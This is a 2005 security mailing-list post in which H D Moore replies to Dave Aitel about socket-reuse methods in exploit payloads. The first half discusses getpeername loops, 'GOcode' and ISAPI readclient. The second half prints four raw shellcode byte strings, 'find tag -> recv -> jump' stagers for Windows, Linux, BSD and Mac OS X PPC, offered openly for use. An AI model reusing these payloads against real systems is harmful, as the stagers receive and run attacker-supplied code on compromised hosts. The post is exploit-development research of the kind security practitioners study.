Re: A white-tip shark has a sensitive enough lateral line to hunt the reef in complete darkness

[H D Moore <hdm-daily-dave () digitaloffense net>]

On Thursday 06 January 2005 20:57, Dave Aitel wrote:
> 1. LSD-style getpeername loop. [...]  in fact, this is the method
> everyone else but Immunity and .gov.cn and a few other random people use 
> (Halvar, for example :>), as far as I know.

Somewhat of a broad statement, NAT has made these obsolete for a while...

> 2. If you were at G-Con 1 several years back you [...] . The one
> relating to stealing sockets is his initial implementation of "GOcode".
> Basically it goes to each socket, sends a G down it, and waits for a
> sec. Then it reads one byte. If it gets an O (hence, the GOcode) then
> it knows it has the right socket. CANVAS uses GOcode for SPARC Solaris,
> Linux, and Windows. Bas Alberts spent a long time making it actually
> work. It sounds easy, but especially on Win32 there are a lot of
> "gotchas". This is usually pretty big code and maybe some people are
> wondering why their connection happened to get a G sent to it - but it
> has one major advantage: It doesn't care about NAT devices.  (Various
> people use PEEK as a refinement on this technique).

Please see the code below. Win32 find tag shellcode, ~92 bytes and works 
on every version of Windows from NT 4.0 to 2003. Commented source and the 
associated paper should be available sometime soon.

> 3. If you search Google for "readclient shellcode" you can see that
> several Chinese exploits  have been succesful at using the
> readclient/writeclient ISAPI functions for back communications. 

This is some really interesting stuff, unfortunately all of the comments 
are in Chinese (and afaik nobody has translated them). It is funny how 
much stuff comes out of xfocus that is years ahead of the rest of the 
world. Maybe some day you will open-source your ECB payloads? :-)


And now on to the warez (all written by metasploit staff, part of 2.3)...

# win32 find tag -> recv -> jump code (92 bytes) 
"\xfc\x33\xff\x64\x8b\x47\x30\x8b\x40\x0c\x8b\x58\x1c\x8b\x1b\x8b"
"\x73\x20\xad\xad\x4e\x03\x06\x3d\x32\x33\x5f\x32\x75\xef\x8b\x6b"
"\x08\x8b\x45\x3c\x8b\x4c\x05\x78\x8b\x4c\x0d\x1c\x8b\x5c\x29\x3c"
"\x03\xdd\x03\x6c\x29\x24\x57\x66\x47\x8b\xf4\x56\x68\x7f\x66\x04"
"\x40\x57\xff\xd5\xad\x85\xc0\x74\xee\x99\x52\xb6\x0c\x52\x56\x57"
"\xff\xd3\xad\x3d\x6d\x73\x66\x21\x75\xdd\xff\xe6";

# linux ia32 find tag -> recv -> jump code (37 bytes)
"\x31\xdb\x53\x89\xe6\x6a\x40\xb7\x0a\x53\x56\x53\x89\xe1\x86\xfb"
"\x66\xff\x01\x6a\x66\x58\xcd\x80\x81\x3e\x6d\x73\x66\x21\x75\xf0"
"\x5f\xfc\xad\xff\xe6";

# bsd ia32 find tag -> recv -> jump code (40 bytes)
"\x31\xd2\x52\x89\xe6\x52\x52\xb2\x80\x52\xb6\x0c\x52\x56\x52\x52"
"\x66\xff\x46\xe8\x6a\x1d\x58\xcd\x80\x81\x3e\x6d\x73\x66\x21\x75"
"\xef\xfc\xad\x5a\x5f\x5a\xff\xe6";

# macos x ppc find tag -> recv -> jump code (76 bytes)
"\x3b\xa0\x0f\xff\x3b\xc0\x0f\xff\x37\x9d\xf0\x02\x7f\xdc\xf0\x51"
"\x41\x80\xff\xf0\x38\x1d\xf0\x67\x7f\xc3\xf3\x78\x38\x81\xef\xf8"
"\x38\xa0\x0f\xff\x38\xdd\xf0\x83\x44\xff\xff\x02\x7c\xc6\x32\x79"
"\xa3\x61\xef\xf8\x2c\x1b\x13\x37\x40\x82\xff\xd4\x38\x81\xef\xfc"
"\x7c\x89\x03\xa6\x4c\x81\x04\x20\x7c\xc6\x32\x79";


Cheers,

-HD
_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
https://lists.immunitysec.com/mailman/listinfo/dailydave